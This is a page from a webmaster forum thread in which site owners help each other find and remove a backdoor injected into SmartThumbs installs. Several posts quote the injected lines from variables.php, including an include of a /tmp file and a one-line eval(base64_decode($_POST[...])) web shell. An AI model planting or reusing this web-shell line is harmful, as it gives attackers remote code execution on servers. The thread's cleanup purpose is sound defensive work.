Page 1 of 5 123 ... LastLast
Results 1 to 20 of 86

Thread: checking and removing ST exploit

  1. #1
    dlxer.com
    Join Date
    Dec 2007
    Posts
    511
    Rep Power
    0

    Default checking and removing ST exploit

    I wrote simple tutorial how to remove ST exploit and check if you're affected with it... because it looks like still many ST installs are infected and are not cleaned. I think update will not clean it... you have to do it manually...

    Porn X Space 4 Webmasters Blog Archive Remove SmartThumbs exploit in 5 steps


    dlXer - Adult design, coding and hosting. ST/STP, TradePulse

  2. #2
    Hello. FrozenJag's Avatar
    Join Date
    Nov 2006
    Location
    US
    Posts
    5,499
    Rep Power
    0

    Default

    Dude.

    Thank you so much for this. I'm pretty sure mine are good but now I can be 100%

    I appreciate it!
    I dont give a lovely mother fuck.

  3. #3
    Capo di tutti capi boneless's Avatar
    Join Date
    Oct 2005
    Location
    Rotterdam
    Posts
    3,780
    Rep Power
    10

    Default

    yellowfiber is checking for me as i did find those lines in there, they just tried to include a different file called webcams.tmp
    icq 14857306
    skype dabone2

  4. #4
    dlxer.com
    Join Date
    Dec 2007
    Posts
    511
    Rep Power
    0

    Default

    Once those are gone you will see increase in traffic for sure...


    dlXer - Adult design, coding and hosting. ST/STP, TradePulse

  5. #5
    Richest man in Babylon Shoplifter's Avatar
    Join Date
    Oct 2005
    Posts
    585
    Rep Power
    0

    Default

    I had ases.tmp on one of my servers. Any idea just how much traffic was lost to this exploit?

  6. #6
    Traffic Guru
    Join Date
    Mar 2007
    Posts
    350
    Rep Power
    0

    Default

    where exactly do you look to see if you have the exploit? I know I have tgps that need updating to latest version but evertime I do this my files get chmod to 777 when it needs to be 755 with my hosts, so have to change permissions all over again!

    Basically I don't want to run something that was not needed in the first place if there is no exploit, cos knowing my luck I will mess it up! lol

  7. #7
    LifestyleAmateurs.com nation-x's Avatar
    Join Date
    Oct 2005
    Location
    Rock Hill, SC
    Posts
    8,780
    Rep Power
    0

    Default

    I haven't found any .tmp files... but I did find that @eval code in a bunch of my sites variables.php

  8. #8
    dlxer.com
    Join Date
    Dec 2007
    Posts
    511
    Rep Power
    0

    Default

    Quote Originally Posted by smoothballs View Post
    where exactly do you look to see if you have the exploit?
    just open in text editor file st/admin/variables.php


    dlXer - Adult design, coding and hosting. ST/STP, TradePulse

  9. #9
    dlxer.com
    Join Date
    Dec 2007
    Posts
    511
    Rep Power
    0

    Default

    Quote Originally Posted by Shoplifter View Post
    I had ases.tmp on one of my servers. Any idea just how much traffic was lost to this exploit?
    I guess they skimmed under 10% percent of clicks...


    dlXer - Adult design, coding and hosting. ST/STP, TradePulse

  10. #10
    Traffic Guru JefersoN's Avatar
    Join Date
    Mar 2007
    Posts
    348
    Rep Power
    0

    Default

    hello, I just found this on one of my ST varaiables
    is this include normal?

    @include_once('/tmp/ases.tmp');
    if not, how can i remove all files?
    Last edited by JefersoN; May 9th, 2010 at 11:18 AM.
    Looking for quality thumbs/text trades? 15k+? hit me up.. mature, MILF, shemale, BBW, interracial, big tits, bondage and general sites...


  11. #11
    Traffic Guru
    Join Date
    Oct 2005
    Posts
    263
    Rep Power
    0

    Default

    that is not normal ... remove the line and delete the file then upgrade to latest version.

    i also have that line only on my variables.php

  12. #12
    Richest man in Babylon Shoplifter's Avatar
    Join Date
    Oct 2005
    Posts
    585
    Rep Power
    0

    Default

    Many thanks for this info MMarko...

    In my case I had quite a few infected sites as I had not updated my ST since they put in the rewrite functions in June of 2009. My newer sites were not hit.

    I found updating and then saving the general settings cleaned the variables.php file. I checked a few databases after with PHPMyAdmin and the niche columns were ok, so I am thinking the upgrade clears this too. I deleted the .tmp files by hand. In my case the .tmp files had quite a few different names but were always 4 characters long.

  13. #13
    Traffic Guru
    Join Date
    Mar 2007
    Posts
    350
    Rep Power
    0

    Default

    Quote Originally Posted by MMarko View Post
    just open in text editor file st/admin/variables.php
    yeah thats what I started doing after reading nation x post so far so good

    Cheers

  14. #14
    Movie-Traffic.com Dan S's Avatar
    Join Date
    Oct 2005
    Posts
    1,524
    Rep Power
    0

    Default

    Yikes, first time I have been affected too

  15. #15
    Serious Contributor
    Join Date
    Oct 2005
    Location
    Somewhere On Planet Earth
    Posts
    1,170
    Rep Power
    0

    Default

    I dont have that "sesa.temp" but I have this one:

    $niche='1';@eval(base64_decode($_POST[qxp]));//';

    should that one line be deleted then ?
    fuck it all . im done

  16. #16
    LifestyleAmateurs.com nation-x's Avatar
    Join Date
    Oct 2005
    Location
    Rock Hill, SC
    Posts
    8,780
    Rep Power
    0

    Default

    Quote Originally Posted by FoZzI View Post
    I dont have that "sesa.temp" but I have this one:

    $niche='1';@eval(base64_decode($_POST[qxp]));//';

    should that one line be deleted then ?
    just this part

    @eval(base64_decode($_POST[qxp]));//';

  17. #17
    dlxer.com
    Join Date
    Dec 2007
    Posts
    511
    Rep Power
    0

    Default

    and you have to clean tables in database too! since ST is taking values for variables.php from table st_settings


    dlXer - Adult design, coding and hosting. ST/STP, TradePulse

  18. #18
    Serious Contributor
    Join Date
    Sep 2006
    Location
    Ny
    Posts
    638
    Rep Power
    0

    Default

    shit found @include_once('/tmp/ases.tmp');
    Try Shinymovies.com and Shinyangels.com from Cashlantis.com!

  19. #19
    LifestyleAmateurs.com nation-x's Avatar
    Join Date
    Oct 2005
    Location
    Rock Hill, SC
    Posts
    8,780
    Rep Power
    0

    Default

    Quote Originally Posted by cybermike View Post
    shit found @include_once('/tmp/ases.tmp');
    oy vey

  20. #20
    Traffic Guru
    Join Date
    Oct 2005
    Posts
    263
    Rep Power
    0

    Default

    look for this file as well...

    /tmp/.ICE-unix/ases.tmp

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •